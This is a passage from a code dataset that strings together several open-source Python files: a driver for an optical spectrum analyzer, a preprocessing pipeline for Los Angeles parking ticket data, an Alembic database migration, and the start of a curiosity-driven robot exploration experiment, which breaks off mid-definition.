:return:\n \"\"\"\n if act_trace not in self._traces:\n raise ValueError('Invalid trace given.')\n # enable writing and display for currently selected trace\n self.command(':TRAC:ATTR:' + str(act_trace) + ' WRITE')\n self.command(':TRAC:STATE:' + str(act_trace) + ' ON')\n # fix all other _traces to not be written to\n for fix_trace in self._traces:\n if act_trace == fix_trace:\n continue\n self.command(':TRAC:ATTR:' + str(fix_trace) + ' FIX')\n # set active trace, must be last 
command given\n self.command(':TRAC:ACT ' + str(act_trace))\n\n def get_data(self):\n \"\"\"\n Get the spectrum data of the measurement. Units depend on the setting on the instrument.\n :return: 2D list with [X-axis Data, Y-Axis Data]\n \"\"\"\n # Make sure the correct data format is used\n # set data format to ascii\n self.command('FORMAT:DATA ASCII')\n act_trace = self._active_trace\n\n wavelength_samples = self.query_ascii_values(':TRAC:DATA:X? {trace}'.format(\n trace=act_trace),\n container=np.ndarray) * 1e9 # data is returned in unit [m], we want it in [nm]\n power_samples = self.query_ascii_values(':TRAC:DATA:Y? {trace}'.format(\n trace=act_trace),\n container=list)\n\n return [wavelength_samples.tolist(), power_samples]\n\n #\n # wavelength properties\n #\n\n @property\n def startwavelength(self):\n \"\"\"\n Returns the start wavelength of the currently set scan window\n :return: start wavelength in nm\n \"\"\"\n return float(self.request(':SENS:WAV:STAR?')) * 1e9\n\n @startwavelength.setter\n def startwavelength(self, start_wavelength_nm):\n \"\"\"\n Set the start wavelength of the scan window\n :param start_wavelength_nm: start wavelength in nm\n \"\"\"\n self.command(':SENS:WAV:STAR {start:0.3f}nm'.format(start=start_wavelength_nm))\n\n @property\n def stopwavelength(self):\n \"\"\"\n Returns the stop wavelength of the currently set scan window\n :return: stop wavelength in nm\n \"\"\"\n return float(self.request(':SENS:WAV:STOP?')) * 1e9\n\n @stopwavelength.setter\n def stopwavelength(self, stop_wavelength_nm):\n \"\"\"\n Set the stop wavelength of the scan window\n :param stop_wavelength_nm: stop wavelength in nm\n \"\"\"\n self.command(':SENS:WAV:STOP {stop:0.3f}nm'.format(stop=stop_wavelength_nm))\n\n @property\n def centerwavelength(self):\n \"\"\"\n Returns current center wavelength [nm].\n :return: center wavelength in nm\n \"\"\"\n return float(self.request(':SENS:WAV:CENT?')) * 1e9\n\n @centerwavelength.setter\n def centerwavelength(self, centerwavelength_nm):\n \"\"\"\n Sets center wavelength\n :param centerwavelength_nm: wavelength in nm\n \"\"\"\n if not 600 <= centerwavelength_nm <= 1700:\n raise ValueError('Center wavelength is out of range. 
Must be between 600 nm and 1700 nm.')\n\n self.command(':SENS:WAV:CENT {center:0.3f}nm'.format(center=centerwavelength_nm))\n\n @property\n def span(self):\n \"\"\"\n Returns current span\n :return: span in nm\n \"\"\"\n return float(self.request(':SENS:WAV:SPAN?')) * 1e9\n\n @span.setter\n def span(self, span_nm):\n \"\"\"\n Sets span\n :param span_nm: span in nm\n \"\"\"\n self.command(':SENS:WAV:SPAN {span:0.3f}nm'.format(span=span_nm))\n\n #\n # resolution and sensitivity\n #\n\n @property\n def sweepresolution(self):\n \"\"\"\n Returns current resolution\n :return: resolution in nm\n \"\"\"\n return float(self.request(':SENS:BAND:RES?')) * 1e9\n\n @sweepresolution.setter\n def sweepresolution(self, resolution_nm):\n \"\"\"\n Sets resolution\n :param resolution_nm: resolution in nm\n \"\"\"\n if not 0.02 <= resolution_nm <= 2:\n raise ValueError('Resolution must be between 0.02 nm and 2 nm.')\n self.command(':SENS:BAND:RES {:0.3f}nm'.format(resolution_nm))\n\n @property\n def _sweep_mode(self):\n \"\"\"\n Returns current sweep mode\n :return: string sweep mode\n \"\"\"\n return self._sweep_modes[int(self.request(':INIT:SMODE?')) - 1]\n\n @_sweep_mode.setter\n def _sweep_mode(self, _sweep_mode):\n \"\"\"\n Set sweep mode\n :param _sweep_mode: string\n :return:\n \"\"\"\n if _sweep_mode not in self._sweep_modes:\n raise ValueError('Invalid sweep mode given: ' + str(_sweep_mode))\n self.command(':INIT:SMODE ' + str(_sweep_mode))\n\n @property\n def sens_mode(self):\n \"\"\"\n Returns current sensitivity mode\n :return: string sensitivity mode\n \"\"\"\n return self.sens_modes[int(self.request(':SENS:SENS?'))]\n\n @property\n def n_points(self):\n \"\"\"\n Get the number of points for the measurement\n \"\"\"\n return int(self.query(\":SENSe:SWEep:POINTS?\"))\n\n @n_points.setter\n def n_points(self, n_points):\n \"\"\"\n Set the number of points for the measurement\n \"\"\"\n self.command(\":SENSe:SWEep:POINTS \" + str(n_points))\n\n","repo_name":"LabExT/LabExT","sub_path":"LabExT/Instruments/OpticalSpectrumAnalyzerAQ6370C.py","file_name":"OpticalSpectrumAnalyzerAQ6370C.py","file_ext":"py","file_size_in_byte":10780,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"45503874417","text":"import re\nimport pandas as pd\nimport numpy as np\nfrom pyproj import Proj, transform\nimport holidays\nimport os\nfrom sklearn.preprocessing import MinMaxScaler\nimport logging\nfrom src.db_connecting import get_postgis_conn\nfrom scipy.stats import gaussian_kde\n\nlogging.basicConfig(level=os.environ.get(\"LOGGING_LEVEL\", \"INFO\"))\naddresses_full = pd.read_csv(\"Data/addresses-in-the-city-of-los-angeles.csv\")\n\n\ndef insert_agencies_into_db():\n pass\n\n\ndef fill_nas(df):\n df = df.where(pd.notnull(df), None)\n return df\n\n\ndef remove_nas(\n df,\n cols_to_remove_nas=[\n \"Issue time\",\n \"Issue Date\",\n \"Latitude\",\n \"Longitude\",\n \"Location\",\n ],\n):\n \"\"\"\n Drops na rows for the columns cols_to_remove_nas\n\n \"\"\"\n for col in cols_to_remove_nas:\n df = df.loc[df[col].isna() == False]\n return df\n\n\ndef get_holidays_data(df, time_col=\"Exact issuing time\"):\n \"\"\"\n Extracts, for each date,\n whether a date was a public holiday,\n and which day of the week it was.\n TODO: Transform this to weekly data rather,\n where both day of the week AND the time is used.\n The period, with circular transformation should 24*60*7\n and the\n \"\"\"\n # https://pypi.org/project/holidays/\n us_holidays = 
holidays.CountryHoliday(\"US\", prov=None, state=\"CA\")\n df[\"is_holiday\"] = df[time_col].apply(\n lambda x: 1 if us_holidays.get(x) is not None else 0\n )\n return df\n\n\n\"\"\"\n Will remove coordinates that are not accurate\n\"\"\"\n\n\ndef convert_coordinates(\n df, remove_na_coords=True, longitude_box=[-120, -115], latitude_box=[32, 36]\n):\n # Copied from another Kaggle user\n # Need to remember who\n # coords are in x/y\n # and we want lat/long, this is from the pyproj documentation\n pm = \"\"\"+proj=lcc +lat_1=34.03333333333333\n +lat_2=35.46666666666667\n +lat_0=33.5\n +lon_0=-118 +x_0=2000000 \"\n \"+y_0=500000.0000000002\n +ellps=GRS80 +datum=NAD83\n +to_meter=0.3048006096012192 +no_defs\"\"\"\n df_bad_coords = df.loc[df[\"Latitude\"] == 99999.0]\n df = df.loc[df[\"Latitude\"] != 99999.0]\n\n # convert to lat/long\n x_in, y_in = df[\"Latitude\"].values, df[\"Longitude\"].values\n long, lat = transform(\n Proj(pm, preserve_units=True), Proj(\"+init=epsg:4326\"), x_in, y_in\n )\n df.loc[:, \"Latitude\"] = lat\n df.loc[:, \"Longitude\"] = long\n\n # Ugly hardcoding: make all positive\n # latitudes negative, make all negative\n # longitudes positive\n df.loc[df[\"Latitude\"] < 0, \"Latitude\"] = df.loc[df[\"Latitude\"] < 0, \"Latitude\"] * (\n -1\n )\n df.loc[df[\"Longitude\"] > 0, \"Longitude\"] = df.loc[\n df[\"Longitude\"] > 0, \"Longitude\"\n ] * (-1)\n\n df = df.loc[\n (df[\"Latitude\"] >= latitude_box[0])\n & (df[\"Latitude\"] <= latitude_box[1])\n & (df[\"Longitude\"] >= longitude_box[0])\n & (df[\"Longitude\"] <= longitude_box[1])\n ]\n\n return pd.concat([df, df_bad_coords], axis=0)\n\n\ndef convert_date_to_hourly(df):\n df[\"Issue time\"] = (\n df[\"Issue time\"]\n .astype(\"int64\")\n .astype(\"str\")\n .str.pad(width=4, side=\"left\", fillchar=\"0\")\n )\n df[\"Issue time\"] = (\n df[\"Issue time\"].str.slice(stop=2)\n + \":\"\n + df[\"Issue time\"].str.slice(start=2)\n + \":00\"\n )\n df[\"Exact issuing time\"] = (\n df[\"Issue Date\"].astype(\"str\").str.slice(stop=11)\n + \" \"\n + df[\"Issue time\"].astype(\"str\")\n ).astype(\"datetime64[ns]\")\n df.drop([\"Issue Date\", \"Issue time\"], axis=1, inplace=True)\n return df\n\n\n\"\"\"\n Will impute, probabilistically,\n missing values for a specific column,\n based on other values.\n This is a very simple one,\n and a better approach would\n probably be to impute while regarding other columns as well.\n\"\"\"\n\n\ndef impute_probabilistically(df, col_to_impute, continuous=True):\n\n density = gaussian_kde(df[col_to_impute].dropna())\n x = np.arange(0, df[col_to_impute].dropna().max())\n density = density.evaluate(x)\n # Normalize density to ensure sum of it is 1\n density = np.divide(density, np.sum(density))\n df.loc[df[col_to_impute].isna(), col_to_impute] = np.random.choice(\n x, p=density, size=df[col_to_impute].isna().sum()\n )\n return df\n\n\ndef circular_transformation(df, col_name, period_length=24):\n \"\"\"transforms one periodic pd.series into two pd.series\n\n input:\n\n df - pandas dataframe\n col_name - column with periodical values (hours, days, months, etc.)\n period_length - max units in a period (24 hours in a day, 60 seconds in\n one hour, 7 days in a week)\n\n no validation yet\n\n \"\"\"\n s = df[col_name]\n s_x = s.apply(lambda x: np.sin(x / period_length * 2 * np.pi))\n s_y = s.apply(lambda x: np.cos(x / period_length * 2 * np.pi))\n kwargs = {col_name + \"_cx\": s_x, col_name + \"_cy\": s_y}\n return df.assign(**kwargs)\n\n\ndef fix_time_vars(df, time_col=\"Exact issuing time\"):\n 
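# The calendar fields below are each run through circular_transformation so that wrap-around values stay adjacent:\n    # e.g. with period 60*24, minute 1439 of a day encodes to (sin, cos) ~= (-0.00436, 0.99999), right next to minute 0 at (0.0, 1.0).\n    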
df[\"time_on_day\"] = df[time_col].dt.hour * 60 + df[time_col].dt.minute\n df = circular_transformation(df, \"time_on_day\", 60 * 24)\n df[\"day_of_year\"] = df[time_col].dt.dayofyear\n df = circular_transformation(df, \"day_of_year\", 365)\n df[\"day_of_week\"] = df[time_col].dt.weekday\n df = circular_transformation(df, \"day_of_week\", 7)\n df[\"Year\"] = df[\"Exact issuing time\"].dt.year\n\n df[\"month\"] = df[\"Exact issuing time\"].dt.month\n df = circular_transformation(df, \"month\", 12)\n\n df[\"day_of_month\"] = df[\"Exact issuing time\"].dt.day\n df = circular_transformation(df, \"day_of_month\", 31)\n sc = MinMaxScaler()\n df[\"year_scaled\"] = sc.fit_transform(df[\"Year\"].values.reshape(-1, 1))\n df[\"date issued\"] = df[\"Exact issuing time\"].dt.date\n return df\n\n\ndef generate_grid_points(x_dim, y_dim, time_start, time_end, time_step=\"1H\"):\n all_time_sections = pd.date_range(start=time_start, end=time_end, freq=\"1H\")\n x = np.linspace(0, 1, x_dim + 1)[1:]\n y = np.linspace(0, 1, y_dim + 1)[1:]\n n = pd.MultiIndex.from_product(\n [all_time_sections, x, y], names=[\"Time section\", \"grid_x\", \"grid_y\"]\n )\n n = n.to_frame()\n n.columns = [\"1\", \"2\", \"3\"]\n n = n.reset_index().drop([\"1\", \"2\", \"3\"], axis=1)\n n = fix_time_vars(n, \"Time section\")\n n = get_holidays_data(n, \"Time section\")\n return n\n\n\ndef rename_column(x):\n return re.sub(r\"\\W+\", \"\", x).lower()\n\n\ndef batch_preprocessing(conn=None):\n \"\"\"\n Preprocesses all the data in batches.\n \"\"\"\n colmapping = {\n \"TICKETNUMBER\".lower(): \"Ticket number\",\n \"ISSUEDATE\".lower(): \"Issue Date\",\n \"ISSUETIME\".lower(): \"Issue time\",\n \"METERID\".lower(): \"Meter Id\",\n \"MARKEDTIME\".lower(): \"Marked Time\",\n \"RPSTATEPLATE\".lower(): \"RP State Plate\",\n \"PLATEEXPIRYDATE\".lower(): \"Plate Expiry Date\",\n \"VIN\".lower(): \"VIN\",\n \"MAKE\".lower(): \"Make\",\n \"BODYSTYLE\".lower(): \"Body Style\",\n \"COLOR\".lower(): \"Color\",\n \"LOCATION\".lower(): \"Location\",\n \"ROUTE\".lower(): \"Route\",\n \"AGENCYCODE\".lower(): \"Agency\",\n \"VIOLATIONCODE\".lower(): \"Violation code\",\n \"VIOLATIONDESC\".lower(): \"Violation Description\",\n \"FINEAMOUNT\".lower(): \"Fine amount\",\n \"LATITUDE\".lower(): \"Latitude\",\n \"LONGITUDE\".lower(): \"Longitude\",\n \"AGENCYDESCRIPTION\".lower(): \"Agency Description\",\n \"COLORDESCRIPTION\".lower(): \"Color Description\",\n \"BODYSTYLEDESC\".lower(): \"Body Style Description\",\n }\n colmapping_reversed = {\n \"Ticket number\": \"TICKETNUMBER\",\n \"Issue Date\": \"ISSUEDATE\",\n \"Issue time\": \"ISSUETIME\",\n \"Meter Id\": \"METERID\",\n \"Marked Time\": \"MARKEDTIME\",\n \"RP State Plate\": \"RPSTATEPLATE\",\n \"Plate Expiry Date\": \"PLATEEXPIRYDATE\",\n \"VIN\": \"VIN\",\n \"Make\": \"MAKE\",\n \"Body Style\": \"BODYSTYLE\",\n \"Color\": \"COLOR\",\n \"Location\": \"LOCATION\",\n \"Route\": \"ROUTE\",\n \"Agency\": \"AGENCYCODE\",\n \"Violation code\": \"VIOLATIONCODE\",\n \"Violation Description\": \"VIOLATIONDESC\",\n \"Fine amount\": \"FINEAMOUNT\",\n \"Latitude\": \"LATITUDE\",\n \"Longitude\": \"LONGITUDE\",\n \"Agency Description\": \"AGENCYDESCRIPTION\",\n \"Color Description\": \"COLORDESCRIPTION\",\n \"Body Style Description\": \"BODYSTYLEDESC\",\n }\n\n if conn is None:\n conn = get_postgis_conn()\n count = 0\n cur = conn.cursor()\n chunksize = int(5e5)\n while True:\n query = \"SELECT * FROM PARKINGTICKET_RAW LIMIT {} OFFSET {};\".format(\n chunksize, count * chunksize\n )\n raw_df = (\n 
fill_nas(pd.read_sql(query, conn))\n .rename(colmapping, axis=1)\n .drop(\"id\", axis=1)\n )\n\n if raw_df.shape[0] == 0:\n break\n df = fill_nas(full_preprocessing(raw_df))\n table = \"PARKINGTICKET\"\n logging.info(\"Inserting into db!\")\n df.columns = [rename_column(x) for x in list(df)]\n df_dict = df.to_dict(orient=\"records\")\n\n cur.executemany(\n \"\"\"INSERT INTO {}({}) VALUES ({})\"\"\".format(\n table,\n \",\".join(list(df.rename(colmapping_reversed, axis=1).columns)),\n \"%(\" + \")s,%(\".join(list(df.columns)) + \")s\",\n ),\n df_dict,\n )\n # Now, insert into the database.\n conn.commit()\n count += 1\n logging.info(\"Inserted processed batch {}\".format(count))\n\n conn.close()\n\n\n\"\"\"\n Does a complete preprocessing\n of a raw dataframe\n incoming to do the density\n\"\"\"\n\n\ndef full_preprocessing(raw_df, verbose=True):\n if verbose:\n logging.info(\"Removing the ones with NA-vals in important columns\")\n df = remove_nas(raw_df)\n if verbose:\n logging.info(\"Converting coordinates\")\n df = convert_coordinates(df)\n df = df.merge(fix_locations(df), on=\"Ticket number\")\n df.drop_duplicates(subset=[\"Ticket number\"], inplace=True)\n imputed_coords = impute_coordinates(df)\n imputed_coords[\"is_imputed\"] = True\n if verbose:\n logging.info(\"Adding imputed coordinates from locations\")\n df = df.merge(imputed_coords, how=\"left\", on=\"Ticket number\")\n df.loc[df[\"is_imputed\"] == True, \"Latitude\"] = df.loc[\n df[\"is_imputed\"] == True, \"LAT\"\n ]\n df.loc[df[\"is_imputed\"] == True, \"Longitude\"] = df.loc[\n df[\"is_imputed\"] == True, \"LON\"\n ]\n df = df.loc[df.Latitude != 99999.0]\n df.drop(\n [\n \"HSE_DIR_CD_y\",\n \"HSE_NBR_y\",\n \"STR_SFX_CD_y\",\n \"STR_NM_y\",\n \"LAT\",\n \"LON\",\n \"is_imputed\",\n ],\n axis=1,\n inplace=True,\n )\n logging.info(list(df))\n df.columns = [\n \"Ticket number\",\n \"Issue Date\",\n \"Issue time\",\n \"Meter Id\",\n \"Marked Time\",\n \"RP State Plate\",\n \"Plate Expiry Date\",\n \"VIN\",\n \"Make\",\n \"Body Style\",\n \"Color\",\n \"Location_x\",\n \"Route\",\n \"Agency\",\n \"Violation code\",\n \"Violation Description\",\n \"Fine amount\",\n \"Latitude\",\n \"Longitude\",\n \"Agency Description\",\n \"Color Description\",\n \"Body Style Description\",\n \"Location\",\n \"HSE_DIR_CD\",\n \"HSE_NBR\",\n \"STR_SFX_CD\",\n \"STR_NM\",\n ]\n df = convert_date_to_hourly(df)\n df = df.loc[(df[\"Exact issuing time\"].astype(\"int64\") > 1.4 * 10 ** 18)]\n df = fill_nas(df)\n return df\n\n\ndef get_street_name(x):\n to_check = [str(x[\"HSE_NBR\"])]\n if x[\"HSE_DIR_CD\"] is not None:\n to_check.append(x[\"HSE_DIR_CD\"])\n\n if x[\"STR_SFX_CD\"] is not None:\n to_check.append(x[\"STR_SFX_CD\"])\n return \" \".join(\n [\n s\n for s in x[\"Location\"].split()\n if s not in to_check\n and str(x[\"HSE_NBR\"]) not in s[: len(str(x[\"HSE_NBR\"]))]\n ]\n )\n\n\ndef impute_coordinates(df, df_has_loc_info=True):\n global addresses_full\n if df_has_loc_info is False:\n locations = fix_locations(df)\n else:\n locations = df[\n [\"Ticket number\", \"HSE_DIR_CD\", \"HSE_NBR\", \"STR_SFX_CD\", \"STR_NM\"]\n ]\n types = {\n \"HSE_DIR_CD\": \"str\",\n \"HSE_NBR\": \"int64\",\n \"STR_SFX_CD\": \"str\",\n \"STR_NM\": \"str\",\n }\n for col in types:\n addresses_full.loc[:, col] = addresses_full[col].astype(types[col])\n locations.loc[:, col] = locations[col].astype(types[col])\n addresses_full = addresses_full.applymap(\n lambda x: x.strip() if isinstance(x, str) else x\n )\n locations = locations.applymap(lambda x: x.strip() if 
isinstance(x, str) else x)\n a = addresses_full[\n [\"HSE_DIR_CD\", \"HSE_NBR\", \"STR_SFX_CD\", \"STR_NM\", \"LAT\", \"LON\"]\n ].merge(locations, on=[\"HSE_DIR_CD\", \"HSE_NBR\", \"STR_SFX_CD\", \"STR_NM\"])\n b = addresses_full[\n [\"HSE_DIR_CD\", \"HSE_NBR\", \"STR_SFX_CD\", \"STR_NM\", \"LAT\", \"LON\"]\n ].merge(locations, on=[\"HSE_NBR\", \"STR_SFX_CD\", \"STR_NM\"])\n b = b.loc[b[\"HSE_DIR_CD_x\"] != b[\"HSE_DIR_CD_y\"]]\n b.rename({\"HSE_DIR_CD_x\": \"HSE_DIR_CD\"}, axis=1, inplace=True)\n b.drop([\"HSE_DIR_CD_y\"], axis=1, inplace=True)\n return pd.concat([a, b], axis=0).drop_duplicates(subset=[\"Ticket number\"])\n\n\ndef fix_locations(df):\n addresses_full = pd.read_csv(\"Data/addresses-in-the-city-of-los-angeles.csv\")\n locations = pd.DataFrame(df[[\"Ticket number\", \"Location\"]])\n locations[\"HSE_DIR_CD\"] = locations[\"Location\"].str.extract(\n r\"(\\bE\\b|\\bN\\b|\\bW\\b|\\bS\\b)\"\n )\n locations[\"HSE_NBR\"] = locations[\"Location\"].apply(\n lambda x: [\n s\n for s in x.split()\n if re.search(r\"\\d+\", s) is not None\n and (any([y in s for y in [\"ST\", \"RD\", \"ND\", \"TH\"]]) == False)\n ]\n )\n locations[\"HSE_NBR\"] = (\n locations[\"HSE_NBR\"]\n .apply(lambda x: x[0] if len(x) > 0 else \"\")\n .str.extract(r\"(\\d+)\")\n )\n locations[\"STR_SFX_CD\"] = locations[\"Location\"].str.extract(\n r\"(\\b\"\n + \"\\\\b|\\\\b\".join(list(addresses_full.STR_SFX_CD.value_counts().index))\n + \")\"\n )\n locations[\"HSE_NBR\"].fillna(0, inplace=True)\n locations[\"STR_NM\"] = locations.apply(lambda x: get_street_name(x), axis=1)\n\n return locations\n\n\ndef extract_more_coordinates(df, df_has_loc_info=True):\n \"\"\"\n Tries to extract as many\n coordinates as possible,\n and adds these new ones to the main data frame.\n \"\"\"\n df = df.loc[df.Location.isna() == False]\n df_wo_coords = df.loc[df.Latitude == 99999.0]\n locations = impute_coordinates(df_wo_coords, df_has_loc_info)\n df_wo_coords = df_wo_coords.merge(\n locations[[\"Ticket number\", \"LAT\", \"LON\"]], on=\"Ticket number\", how=\"left\"\n )\n df_wo_coords = df_wo_coords.drop([\"Latitude\", \"Longitude\"], axis=1).rename(\n {\"LAT\": \"Latitude\", \"LON\": \"Longitude\"}, axis=1\n )\n logging.info(df_wo_coords.head())\n df_wo_coords.dropna(subset=[\"Latitude\", \"Longitude\"], inplace=True)\n return pd.concat([df_wo_coords, df], axis=0).drop_duplicates(\n subset=[\"Ticket number\"], keep=\"first\"\n )\n","repo_name":"Filco306/ParkingTicketPredsLA","sub_path":"src/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":15171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15331102065","text":"\"\"\"allow null file summary\n\nRevision ID: 59f23455295a\nRevises: 1bb8b462a580\nCreate Date: 2021-09-15 15:57:33.923637\n\n\"\"\"\n\n# pylint: disable-all\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '59f23455295a'\ndown_revision = '1ee42f0ba37d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('self_serve_source', schema=None) as batch_op:\n batch_op.alter_column(\n 'file_summary_id', existing_type=sa.INTEGER(), nullable=True\n )\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n with op.batch_alter_table('self_serve_source', schema=None) as batch_op:\n batch_op.alter_column(\n 'file_summary_id', existing_type=sa.INTEGER(), nullable=False\n )\n\n # ### end Alembic commands ###\n","repo_name":"Zenysis/Harmony","sub_path":"web/server/migrations/versions/59f23455295a_allow_null_file_summary.py","file_name":"59f23455295a_allow_null_file_summary.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"33974426905","text":"from __future__ import print_function\n\nimport numpy as np\nfrom environment import ArmToolsToysEnvironment\nfrom explauto.utils import prop_choice\nimport time\nfrom learning_module import LearningModule\nimport matplotlib.pyplot as plt\nimport cProfile\nimport pickle\n\n\nclass Experiment(object):\n def __init__(self, \n seed=0,\n explo_noise=0.05, \n rmb_prop=0.1, \n optim_explo=\"full\", \n n_explore=4, \n condition=\"RMB\",\n end_point=False,\n distractors=\"both\"):\n \n self.seed = seed\n self.explo_noise = explo_noise\n self.rmb_prop = rmb_prop\n self.optim_explo = optim_explo\n self.n_explore = n_explore\n self.condition = condition\n self.end_point = end_point\n self.distractors = distractors\n \n np.random.seed(self.seed)\n \n \n self.environment = ArmToolsToysEnvironment(\n rdm_distractors=distractors == \"random\" or distractors == \"both\")\n \n self.data = []\n self.interests_evolution = []\n self.explo = None\n self.chosen_modules = []\n self.steps = []\n self.i = 0\n \n # Define motor and sensory spaces:\n self.m_ndims = 4 # number of motor parameters\n self.s_ndims = 31 # number of sensory parameters\n self.max_steps = 5\n self.m_space = range(self.m_ndims)\n self.s_hand = range(self.m_ndims, self.m_ndims+3)\n self.s_tool1 = range(self.m_ndims+3, self.m_ndims+5)\n self.s_tool2 = range(self.m_ndims+5, self.m_ndims+7)\n self.s_obj1 = range(self.m_ndims+7, self.m_ndims+9)\n self.s_obj2 = range(self.m_ndims+9, self.m_ndims+11)\n self.s_obj3 = range(self.m_ndims+11, self.m_ndims+13)\n self.s_obj4 = range(self.m_ndims+13, self.m_ndims+15)\n self.s_obj5 = range(self.m_ndims+15, self.m_ndims+17)\n self.s_obj6 = range(self.m_ndims+17, self.m_ndims+19)\n self.s_obj7 = range(self.m_ndims+19, self.m_ndims+21)\n self.s_obj8 = range(self.m_ndims+21, self.m_ndims+23)\n self.s_obj9 = range(self.m_ndims+23, self.m_ndims+25)\n self.s_obj10 = range(self.m_ndims+25, self.m_ndims+27)\n self.s_obj11 = range(self.m_ndims+27, self.m_ndims+29)\n self.s_obj12 = range(self.m_ndims+29, self.m_ndims+31)\n \n self.s_flat = range(self.m_ndims, self.m_ndims + 31)\n \n self.s_spaces = dict(s_hand = range(self.m_ndims, self.m_ndims+3),\n s_tool1 = range(self.m_ndims+3, self.m_ndims+5),\n s_tool2 = range(self.m_ndims+5, self.m_ndims+7),\n s_obj1 = range(self.m_ndims+7, self.m_ndims+9),\n s_obj2 = range(self.m_ndims+9, self.m_ndims+11),\n s_obj3 = range(self.m_ndims+11, self.m_ndims+13),\n s_obj4 = range(self.m_ndims+13, self.m_ndims+15),\n s_obj5 = range(self.m_ndims+15, self.m_ndims+17),\n s_obj6 = range(self.m_ndims+17, self.m_ndims+19),\n s_obj7 = range(self.m_ndims+19, self.m_ndims+21),\n s_obj8 = range(self.m_ndims+21, self.m_ndims+23),\n s_obj9 = range(self.m_ndims+23, self.m_ndims+25),\n s_obj10 = range(self.m_ndims+25, self.m_ndims+27),\n s_obj11 = range(self.m_ndims+27, self.m_ndims+29),\n s_obj12 = range(self.m_ndims+29, self.m_ndims+31))\n \n # Create learning modules:\n self.learning_modules = {}\n if condition == \"FRGB\" or condition == \"rmb\":\n 
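# Note: these two conditions appear to collapse exploration onto a single module over the full flat sensory space;\n            # \"rmb\" additionally forces pure random motor babbling in run() below, while \"FRGB\" still samples random goals there.\n            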
self.n_explore = 1\n self.n_test = 0\n self.learning_modules['mod1'] = LearningModule(\"mod1\", self.m_space, self.s_flat, self.max_steps, \n self.environment.conf, explo_noise=explo_noise, optim_explo=\"full\", end_point=end_point)\n elif condition == \"SGS\":\n self.n_explore = 1\n self.n_test = 0\n self.learning_modules['mod4'] = LearningModule(\"mod4\", self.m_space, self.s_obj1, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n else:\n self.n_test = 1\n \n self.learning_modules['mod1'] = LearningModule(\"mod1\", self.m_space, self.s_hand, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod2'] = LearningModule(\"mod2\", self.m_space, self.s_tool1, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod3'] = LearningModule(\"mod3\", self.m_space, self.s_tool2, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n self.learning_modules['mod4'] = LearningModule(\"mod4\", self.m_space, self.s_obj1, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n self.learning_modules['mod7'] = LearningModule(\"mod7\", self.m_space, self.s_obj4, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n if distractors == \"random\" or distractors == \"both\":\n self.learning_modules['mod10'] = LearningModule(\"mod10\", self.m_space, self.s_obj7, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod11'] = LearningModule(\"mod11\", self.m_space, self.s_obj8, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n if distractors == \"static\" or distractors == \"both\":\n self.learning_modules['mod5'] = LearningModule(\"mod5\", self.m_space, self.s_obj2, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod6'] = LearningModule(\"mod6\", self.m_space, self.s_obj3, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n self.learning_modules['mod8'] = LearningModule(\"mod8\", self.m_space, self.s_obj5, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod9'] = LearningModule(\"mod9\", self.m_space, self.s_obj6, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n self.learning_modules['mod12'] = LearningModule(\"mod12\", self.m_space, self.s_obj9, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod13'] = LearningModule(\"mod13\", self.m_space, self.s_obj10, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod14'] = LearningModule(\"mod14\", self.m_space, self.s_obj11, self.max_steps, self.environment.conf, explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n self.learning_modules['mod15'] = LearningModule(\"mod15\", self.m_space, self.s_obj12, self.max_steps, self.environment.conf, 
explo_noise=explo_noise, optim_explo=optim_explo, end_point=end_point)\n \n self.avg_steps = 1.\n \n self.n_stick1_moved = 0\n self.n_stick2_moved = 0\n self.n_obj1_moved = 0\n self.n_obj2_moved = 0\n self.last_print = 0\n \n def execute_perceive(self, m):\n steps = len(m)//self.m_ndims\n s = self.environment.update(m) # execute this command and observe the corresponding sensory effect\n ms_array = np.zeros((steps, self.m_ndims + self.s_ndims), dtype=np.float16)\n ms_array[:,:self.m_ndims] = np.array(np.split(np.array(m), steps), dtype=np.float16)\n ms_array[:,self.m_ndims:] = np.array(np.split(np.array(s), steps), dtype=np.float16)\n #print \"ms_array\", ms_array, ms_array.shape\n # Update each sensorimotor models:\n for mid in self.learning_modules.keys():\n #print mid, self.learning_modules[mid].s_space, ms_array[:,self.learning_modules[mid].s_space]\n self.learning_modules[mid].update_sm(m, np.concatenate(ms_array[:,self.learning_modules[mid].s_space]))\n \n self.data.append(ms_array)\n self.steps.append(steps)\n self.i += 1\n return ms_array, steps\n \n \n def compute_explo_space(self, 